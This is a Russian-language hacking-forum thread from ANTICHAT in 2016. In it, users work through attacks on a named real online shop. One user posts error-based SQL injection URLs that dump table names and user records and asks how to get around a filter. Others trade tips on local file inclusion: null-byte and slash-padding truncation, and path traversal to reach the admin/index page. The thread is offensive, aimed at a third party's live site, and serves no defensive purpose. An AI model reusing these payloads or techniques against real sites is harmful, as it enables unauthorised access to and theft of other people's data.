ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.12.2016, 13:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
1314
Репутация:
0
|
|
Спасибо, уже разобралась))))
|
|
|
|
05.12.2016, 13:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
1314
Репутация:
0
|
|
Ребята, как листать записи при такой инъекции? Что то совсем не получается
http://stylesosh.ru/Orangevaya-tols...cat(name),1,1024)from(tehnocity_user))))and '/
XPATH syntax error: ':quest,' -
SELECT * FROM `tehnocity_menu` WHERE `sim_link`='Orangevaya-tolstovka'and+extractvalue(2,concat(0x3a,(select+m id(group_concat(name),1,1024)from(tehnocity_user)) ))and'' LIMIT 0, 1
Ясно как листать.. Там всего один юзер в этой таблице((((
/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat
(user_id,0x3a,name,0x3a),1,1024)from(users)where(u ser_id)=(1))))and'/ |
|
|
|
05.12.2016, 15:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
1314
Репутация:
0
|
|
http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(select+m id(group_concat(0x3a,table_name,0x3a),1,1024)from( information_schema.tables))))and'/
Не пропускает точку((((((( Как быть????? Хексить пробовала, не выходит. Посоветуйте пожалуйста.
Попробовала сбрутить таблицы по словарю с античата.. Ничего нормального не удалось вытащить((
|
|
|
|
06.12.2016, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
|
|
|
|
06.12.2016, 19:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать
|
|
|
|
06.12.2016, 19:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от t0ma5
t0ma5 said:
↑
null-byte там не работает, можно попробовать расширение отбросить через кучу слешей(2048/4096/etc), влом линк искать работает, там другая проблема
|
|
|
|
06.12.2016, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от BabaDook
BabaDook said:
↑
работает, там другая проблема неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?
|
|
|
|
06.12.2016, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от t0ma5
t0ma5 said:
↑
неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема? Точно .
|
|
|
|
06.12.2016, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема? У меня даже admin/index - не подключает
|
|
|
|
06.12.2016, 20:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от nik1201
nik1201 said:
↑
У меня даже admin/index - не подключает потому что ../admin/index
php/ лишняя директория
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
